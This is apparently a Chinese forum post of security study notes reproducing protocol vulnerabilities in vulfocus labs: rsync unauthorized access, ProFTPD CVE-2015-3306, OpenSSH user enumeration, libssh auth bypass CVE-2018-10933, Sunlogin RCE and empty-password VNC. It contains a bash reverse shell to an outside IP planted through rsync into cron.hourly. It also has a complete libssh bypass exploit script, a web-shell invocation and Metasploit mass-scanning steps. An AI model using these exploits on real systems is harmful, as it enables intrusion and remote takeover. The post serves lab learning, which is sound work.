登录 注册

协议漏洞

rsync

  1. 未授权访问

    1. 概念
      1. rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配置 ACL 或访问密码,我们将可以读写目标服务器文件。
    2. 复现

      1. 靶场

        1. vulfocus/rsync-common:latest

      2. 判断是否存在漏洞 rsync rsync://123.58.224.8:24947

        1. image

      3. 读取文件夹: rsync rsync://123.58.224.8:24947/src

        1. image

      4. 下载文件:rsync rsync://123.58.224.8:24947/src/etc/passwd ./

        1. image

      5. 上传文件:rsync -av passwd rsync://123.58.224.8:24947/src/tmp/passwd

        1. image

      6. 反弹 shell:

        1. 获取目标服务器的任务信息 rsync rsync://123.58.224.8:24947/src/etc/crontab /root/cron.txt

          1. image

        2. 创建文件 chmod +x shell

        3. shell 文件内容:

          1.  #!/bin/bash
 /bin/bash -i >& /dev/tcp/43.139.186.80/5566 0>&1

        4. 给予执行权限 chmod +x shell

        5. 上传文件 rsync -av shell rsync://123.58.224.8:24947/src/etc/cron.hourly

        6. nc 监听,等待定时任务触发 nc -lvvp 5566

          1. image
    3. 个别工具检测

      1. 工具:

        1. kali 自带的 msf

      2. 过程

        1. msfconsole
        2. use auxiliary/scanner/rsync/modules_list
        3. set rhost 39.103.170.93
        4. set rport 873
        5. run
        6. image
    4. 批量工具检测

      1. 工具:

        1. kali 自带的 msf
        2. 自己准备好大量 ip

      2. 过程

        1. msfconsole
        2. use auxiliary/scanner/rsync/modules_list
        3. set rhosts file:/home/kali/Desktop/1.txt
        4. set threads 10
        5. run
        6. image
        7. 尝试连接
        8. image

proftpd

  1. 远程命令

    1. 介绍
      1. ProFTPD 是 ProFTPD 团队的一套开源的 FTP 服务器软件。该软件具有可配置性强、安全、稳定等特点。
        ProFTPD 1.3.5 中的 mod_copy 模块允许远程攻击者通过站点 cpfr 和 site cpto 命令读取和写入任意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用 ProFTPD 服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdline 将 PHP 有效负载复制到网站目录,可以实现 PHP 远程代码执行。
    2. CVE-2015-3306 复现

      1. 靶场:vulfocus proftpd 远程代码执行 (CVE-2015-3306)

        1. 端口对应:21:43182 80:21905

      2. 工具:exploit-CVE-2015-3306-master.zip

      3. 直接执行脚本即可 python exploit.py --host 123.58.224.8 --port 21905 --path "/var/www/html/"

        1. image

      4. 访问 http://123.58.224.8:21905/backdoor.php?cmd=ls 成功执行命令

        1. image

openssh

  1. 信息泄露

    1. 介绍

      1. OpenSSH(OpenBSD Secure Shell)是 OpenBSD 计划组所维护的一套用于安全访问远程计算机的连接工具。

        OpenSSH 7.7 及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。攻击者可通过发送特制的请求利用该漏洞枚举用户名称

    2. 复现

      1. 靶场

        1. vulfocus/ssh-passwd:latest

      2. 工具:CVE-2018-15473-Exploit

      3. 直接使用工具枚举即可,python sshUsernameEnumExploit.py --port 39378 --userList top_shortlist.txt 123.58.224.8

  2. libssh 身份绕过

    1. 介绍
      1. libssh 是一个用于访问 SSH 服务的 C 语言开发包,它能够执行远程命令、文件传输,同时为远程的程序提供安全的传输通道。server-side state machine 是其中的一个服务器端状态机。
        在 libssh 的服务器端状态机中发现了一个逻辑漏洞。攻击者可以 MSG_USERAUTH_SUCCESS 在身份验证成功之前发送消息。这样可以绕过身份验证并访问目标 SSH 服务器。
    2. 条件
      1. libssh 0.6 版本以下
    3. 危害
      1. libssh 0.6 版本以下任意命令执行
    4. 复现

      1. 靶场

        1. vuifoucus libssh 身份验证绕过(CVE-2018-10933)

      2. 直接使用脚本即可 python38 libssh.py 123.58.224.8 61334 "ls"

        1.  #!/usr/bin/env python3
 import sys
 import paramiko
 import socket
 import logging

 logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
 bufsize = 2048


 def execute(hostname, port, command):
     sock = socket.socket()
     try:
         sock.connect((hostname, int(port)))

         message = paramiko.message.Message()
         transport = paramiko.transport.Transport(sock)
         transport.start_client()

         message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
         transport._send_message(message)

         client = transport.open_session(timeout=10)
         client.exec_command(command)

         # stdin = client.makefile("wb", bufsize)
         stdout = client.makefile("rb", bufsize)
         stderr = client.makefile_stderr("rb", bufsize)

         output = stdout.read()
         error = stderr.read()

         stdout.close()
         stderr.close()

         #return output.decode()
         return (output+error).decode()
     except paramiko.SSHException as e:
         logging.exception(e)
         logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
     except socket.error:
         logging.debug("Unable to connect.")

     return None


 if __name__ == '__main__':
     print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
 //请使用最新版的python运行

        image

向日葵

  1. 远程 RCE

    1. 介绍

      1. 向日葵远程控制是一款面向企业和专业人员的远程 pc 管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。

        Sunlogin RCE 是漏洞发生在接口/check 处,当参数 cmd 的值以 ping 或者 nslookup 开头时可以构造命令实现远程命令执行利用,客户端开启客户端会自动随机开启一个大于 40000 的端口号。

    2. 条件

      1. 影响客户端版本:

        • 11.1.1
        • 10.3.0.27372
        • 11.0.0.33162
    3. 靶场:

      1. image

      2. 其实这都不用复现因为如果真的可以成功,这不就是成钓鱼软件嘛,废物漏洞直接强制更新

        1. image

      3. 复现就直接运行 xrkRce.exe -h ip地址

VNC

  1. 配置不当
    1. 介绍
      1. VNC(Virtual Network Computing)是一种远程桌面共享系统,它允许用户通过网络连接远程控制另一台计算机。VNC 使用 RFB(远程帧缓冲)协议,可以在不同的操作系统之间工作,如 Windows、Mac、Linux 等。它的工作原理是将远程计算机的屏幕内容传输到本地设备,同时将本地的鼠标和键盘输入发送到远程计算机。VNC 通常用于远程技术支持、远程办公、教育培训等场景,具有跨平台、易用性高的特点,但也需要注意网络安全问题。在使用时,通常需要在远程计算机上运行 VNC 服务器,而在本地设备上运行 VNC 查看器来建立连接。
      2. 但是使用空密码就会导致其他人直接连接上来
      3. image
      4. 默认端口号:5900
    2. 复现

      1. 靶场

        1. 受害者安装 sever,攻击者安装 viewer 即可
        2. 下载链接:https://pan.baidu.com/s/1SwwfrDIbxdcq_0xKCuPoJQ?pwd=cong
        3. image

      2. 用 nmap 扫描扫主机开放 5900 端口

        1. image

      3. 尝试用 vnc 进行连接

        1. image

      4. 发现可以连接成功

        1. image

  • CongSec

    本标签主要用于分享网络空间安全专业的学习笔记

    5 引用 • 1 回帖 • 1 关注
香港 位置
2 2

相关帖子

回帖
协议漏洞

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...
CongSec
没事别关注我, 因为发帖需要更多积分 香港
回帖
51
 帖子
29
 积分
638